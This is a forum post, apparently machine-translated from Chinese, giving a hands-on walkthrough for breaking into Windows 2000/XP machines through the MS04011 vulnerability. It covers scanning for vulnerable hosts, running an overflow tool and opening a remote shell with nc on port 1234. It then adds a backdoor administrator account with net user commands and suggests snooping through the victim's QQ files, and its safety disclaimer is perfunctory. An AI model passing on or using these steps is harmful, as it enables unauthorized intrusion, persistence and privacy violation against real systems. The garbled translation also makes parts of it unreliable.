MS04011 vulnerability

zhaozj2021-02-12  189

Oh, everyone should know this vulnerability, haha, it is so good. Hacker uses it to get the operating system's Administrators permission to get the shell of the system. Not much to say anything else, see how they are all invaded by others.

1. First, go to download the MS04011 vulnerability to overflow, there are more online.

Tools include DSSCAN, Getos, MS04011 overflow tool

DSSCAN: This tool is a tool for scanning if there is a MS04011 vulnerability. When you scan the target machine, it will list its IP address, host name, NetBIOS name, and the most important thing is status information. It can Scanned to all survive hosts in this IP, if there is a machine of the MS04011 vulnerability, list Vulnerable in status information, otherwise not vulnerable. Generally scan 64 IP addresses at a time.

Getos: It is used to get the type of operating system, but must be open to the 139 port of the machine.

MS04011: It is the tool used to overflow.

2. How to overflow

First use DSSCAN, enter IP in the IP, then click on the right key, so that it enters the right box, you can choose

Then click the start. For example, we sweep to a machine result for this

IP hostname netbios status

192.168.1.33 you you Vulnerable

192.168.1.34 Haha Haha Not Vulnerable

Everyone can see the machine status of 192.168.1.33 for Vulnerable, which means that it exists the vulnerability of this MS04011.

Let us overflow it below, first get the type of machine to the other machine before starting overflow. Getos get

Enter CMD, enter, then go to your program path, enter Getos 192.168.1.33

The result will appear

[*] Connecting Port 139 ... ..

[*] Sending session request ... ..

[*] Sending Negotiation Request ....

Sending Setup Account Request ....

[*] Successful ...

REMOTE OS:

-------------

Workgroup This is the name of the working group

Windows 2000 Lan Manger

Windows 5.0 This is the type of operating system, if Windows 5.1 is XP

Ok, we know that its type is 2000, then we will use MS04011 to overflow.

First open two CMD windows, simultaneously enter MS04011 0 192.168.1.33 in two inside, then one one carries

In one cmd

Shellcode Size 404

RET VALUE = 1726 // Note 1726 is the code that overflows success

For XP systems, MS04011 1 192.168.1.33

3. How to get the shell of the machine

To use the most powerful Swiss army knife (name is NC), haha, this tool is not usually, go online.

Then enter NC 192.168.1.33 1234 in CMD. 1234 is a spilled port number. Haha does not appear such a prompt

C: / Winnt / System32>

// Haha, you have succeeded. You can do it.

For example: Net user haha ​​123 / add // can establish a user net localgroup administrators haha ​​/ add // of the 123-like machine, which enables Haha to include the Administrators group. Of course, you can go to the application's tencent directory. MM's QQ number, I will contact it later.

Serious statement: Do not use this method to do illegal behavior, if you don't have any responsibility. Publish this paper is to enable you to pay attention to self-system security, often patch. There are a lot of machines in the country where there is such a loophole, hehe! ! ! ! !

转载请注明原文地址:https://www.9cbs.com/read-6854.html

New Post(0)